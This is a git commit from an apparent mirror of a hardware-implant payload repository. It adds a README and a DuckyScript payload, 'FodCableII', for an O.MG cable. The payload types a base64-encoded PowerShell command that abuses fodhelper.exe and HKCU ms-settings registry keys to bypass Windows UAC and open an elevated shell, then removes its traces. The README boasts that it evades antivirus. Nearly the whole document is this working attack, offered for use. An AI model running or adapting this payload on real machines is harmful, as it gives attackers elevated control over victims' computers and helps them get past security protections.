mirror of https://github.com/hak5/omg-payloads.git
commit
60459f46c9
|
@ -0,0 +1,12 @@
|
|||
**Title: FodCableII - UAC Bypass**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
|
||||
**What is FodCableII?**
|
||||
#
|
||||
*Use your O.MG Cable / Plug to bypass UAC using one of the Fodhelper.exe methods.*
|
||||
*This POC will get you an elevated powershell instance and won't trigger AV at 04/2022*
|
||||
#
|
||||
!CleanUp will execute directly after execution!
|
|
@ -0,0 +1,22 @@
|
|||
REM FodCableII
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.2.5 or higher
|
||||
|
||||
REM Using FodHelper.exe to bypass UAC and get an elevated shell
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
|
||||
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
|
||||
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
|
||||
DELAY 200
|
||||
ENTER
|
Loading…
Reference in New Issue